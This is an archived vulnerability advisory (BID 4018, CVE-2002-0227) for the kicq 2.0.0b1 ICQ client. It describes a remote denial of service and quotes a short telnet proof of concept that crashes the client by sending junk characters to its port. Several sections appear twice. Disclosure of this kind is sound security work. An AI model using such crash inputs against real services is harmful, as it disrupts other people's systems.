kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability
BID:4018
Info
kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability
| Bugtraq ID: | 4018 |
| Class: | Failure to Handle Exceptional Conditions |
| CVE: |
CVE-2002-0227 |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 02 2002 12:00AM |
| Updated: | Jul 11 2009 09:56AM |
| Credit: | Posted to BugTraq on February 02, 2002 by Rafael San Miguel Carrasco. |
| Vulnerable: |
KICQ KICQ 2.0 .0b1 |
| Not Vulnerable: | |
Discussion
kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability
kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client.
kicq 2.0.0b1 is an ICQ client for the K Desktop Environment (KDE). kicq can be crashed remotely by initiating a telnet connection to a port it is listening on and sending "random" characters. This does not affect other components of the system, only the ICQ client.
Exploit / POC
kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability
As an example (from the original BugTraq message by Rafael San Miguel Carrasco - see references):
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
garbage
Connection closed by foreign host.
As an example (from the original BugTraq message by Rafael San Miguel Carrasco - see references):
bash-2.05$ telnet 10.0.0.1 1030
Trying 10.0.0.1...
Connected to 10.0.0.1.
Escape character is '^]'.
garbage
Connection closed by foreign host.
Solution / Fix
kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently the SecurityFocus staff are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
kicq 2.0.0b1 Invalid ICQ Packet Denial of Service Vulnerability
References:
References:
- Project: kicq (Sourceforge)
- Version 5 of the ICQ Protocol (Henrik Isaksson)